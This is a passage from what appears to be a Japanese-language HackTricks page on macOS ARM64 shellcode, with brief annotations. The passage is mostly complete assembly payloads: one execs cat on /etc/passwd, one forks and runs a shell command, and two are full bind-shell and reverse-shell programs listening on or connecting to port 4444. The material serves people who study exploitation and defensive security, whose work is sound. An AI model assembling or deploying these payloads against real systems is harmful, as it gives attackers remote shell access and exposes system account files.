svc #0x1337 ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16.
sh_path: .asciz "/bin/sh"
catで読む
目的は execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)
を実行することであり、第二引数(x1)はパラメータの配列です(これはメモリ内ではアドレスのスタックを意味します)。
.section __TEXT,__text ; Begin a new section of type __TEXT and name __text
.global _main ; Declare a global symbol _main
.align 2 ; Align the beginning of the following code to a 4-byte boundary
_main:
; Prepare the arguments for the execve syscall
sub sp, sp, #48 ; Allocate space on the stack
mov x1, sp ; x1 will hold the address of the argument array
adr x0, cat_path
str x0, [x1] ; Store the address of "/bin/cat" as the first argument
adr x0, passwd_path ; Get the address of "/etc/passwd"
str x0, [x1, #8] ; Store the address of "/etc/passwd" as the second argument
str xzr, [x1, #16] ; Store NULL as the third argument (end of arguments)
adr x0, cat_path
mov x2, xzr ; Clear x2 to hold NULL (no environment variables)
mov x16, #59 ; Load the syscall number for execve (59) into x8
svc 0 ; Make the syscall
cat_path: .asciz "/bin/cat"
.align 2
passwd_path: .asciz "/etc/passwd"
フォークからshでコマンドを呼び出すことで、メインプロセスが終了しないようにする
.section __TEXT,__text ; Begin a new section of type __TEXT and name __text
.global _main ; Declare a global symbol _main
.align 2 ; Align the beginning of the following code to a 4-byte boundary
_main:
; Prepare the arguments for the fork syscall
mov x16, #2 ; Load the syscall number for fork (2) into x8
svc 0 ; Make the syscall
cmp x1, #0 ; In macOS, if x1 == 0, it's parent process, https://opensource.apple.com/source/xnu/xnu-7195.81.3/libsyscall/custom/__fork.s.auto.html
beq _loop ; If not child process, loop
; Prepare the arguments for the execve syscall
sub sp, sp, #64 ; Allocate space on the stack
mov x1, sp ; x1 will hold the address of the argument array
adr x0, sh_path
str x0, [x1] ; Store the address of "/bin/sh" as the first argument
adr x0, sh_c_option ; Get the address of "-c"
str x0, [x1, #8] ; Store the address of "-c" as the second argument
adr x0, touch_command ; Get the address of "touch /tmp/lalala"
str x0, [x1, #16] ; Store the address of "touch /tmp/lalala" as the third argument
str xzr, [x1, #24] ; Store NULL as the fourth argument (end of arguments)
adr x0, sh_path
mov x2, xzr ; Clear x2 to hold NULL (no environment variables)
mov x16, #59 ; Load the syscall number for execve (59) into x8
svc 0 ; Make the syscall
_exit:
mov x16, #1 ; Load the syscall number for exit (1) into x8
mov x0, #0 ; Set exit status code to 0
svc 0 ; Make the syscall
_loop: b _loop
sh_path: .asciz "/bin/sh"
.align 2
sh_c_option: .asciz "-c"
.align 2
touch_command: .asciz "touch /tmp/lalala"
バインドシェル
ポート 4444 での https://raw.githubusercontent.com/daem0nc0re/macOS_ARM64_Shellcode/master/bindshell.s からのバインドシェル
.section __TEXT,__text
.global _main
.align 2
_main:
call_socket:
// s = socket(AF_INET = 2, SOCK_STREAM = 1, 0)
mov x16, #97
lsr x1, x16, #6
lsl x0, x1, #1
mov x2, xzr
svc #0x1337
// save s
mvn x3, x0
call_bind:
/*
* bind(s, &sockaddr, 0x10)
*
* struct sockaddr_in {
* __uint8_t sin_len; // sizeof(struct sockaddr_in) = 0x10
* sa_family_t sin_family; // AF_INET = 2
* in_port_t sin_port; // 4444 = 0x115C
* struct in_addr sin_addr; // 0.0.0.0 (4 bytes)
* char sin_zero[8]; // Don't care
* };
*/
mov x1, #0x0210
movk x1, #0x5C11, lsl #16
str x1, [sp, #-8]
mov x2, #8
sub x1, sp, x2
mov x2, #16
mov x16, #104
svc #0x1337
call_listen:
// listen(s, 2)
mvn x0, x3
lsr x1, x2, #3
mov x16, #106
svc #0x1337
call_accept:
// c = accept(s, 0, 0)
mvn x0, x3
mov x1, xzr
mov x2, xzr
mov x16, #30
svc #0x1337
mvn x3, x0
lsr x2, x16, #4
lsl x2, x2, #2
call_dup:
// dup(c, 2) -> dup(c, 1) -> dup(c, 0)
mvn x0, x3
lsr x2, x2, #1
mov x1, x2
mov x16, #90
svc #0x1337
mov x10, xzr
cmp x10, x2
bne call_dup
call_execve:
// execve("/bin/sh", 0, 0)
mov x1, #0x622F
movk x1, #0x6E69, lsl #16
movk x1, #0x732F, lsl #32
movk x1, #0x68, lsl #48
str x1, [sp, #-8]
mov x1, #8
sub x0, sp, x1
mov x1, xzr
mov x2, xzr
mov x16, #59
svc #0x1337
リバースシェル
From https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/reverseshell.s, revshell to 127.0.0.1:4444
.section __TEXT,__text
.global _main
.align 2
_main:
call_socket:
// s = socket(AF_INET = 2, SOCK_STREAM = 1, 0)
mov x16, #97
lsr x1, x16, #6
lsl x0, x1, #1
mov x2, xzr
svc #0x1337
// save s
mvn x3, x0
call_connect:
/*
* connect(s, &sockaddr, 0x10)
*
* struct sockaddr_in {
* __uint8_t sin_len; // sizeof(struct sockaddr_in) = 0x10
* sa_family_t sin_family; // AF_INET = 2
* in_port_t sin_port; // 4444 = 0x115C
* struct in_addr sin_addr; // 127.0.0.1 (4 bytes)
* char sin_zero[8]; // Don't care
* };
*/
mov x1, #0x0210
movk x1, #0x5C11, lsl #16
movk x1, #0x007F, lsl #32
movk x1, #0x0100, lsl #48
str x1, [sp, #-8]
mov x2, #8
sub x1, sp, x2
mov x2, #16
mov x16, #98
svc #0x1337
lsr x2, x2, #2
call_dup:
// dup(s, 2) -> dup(s, 1) -> dup(s, 0)
mvn x0, x3
lsr x2, x2, #1
mov x1, x2
mov x16, #90
svc #0x1337
mov x10, xzr
cmp x10, x2
bne call_dup
call_execve:
// execve("/bin/sh", 0, 0)
mov x1, #0x622F
movk x1, #0x6E69, lsl #16
movk x1, #0x732F, lsl #32
movk x1, #0x68, lsl #48
str x1, [sp, #-8]
mov x1, #8
sub x0, sp, x1
mov x1, xzr
mov x2, xzr
mov x16, #59
svc #0x1337
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。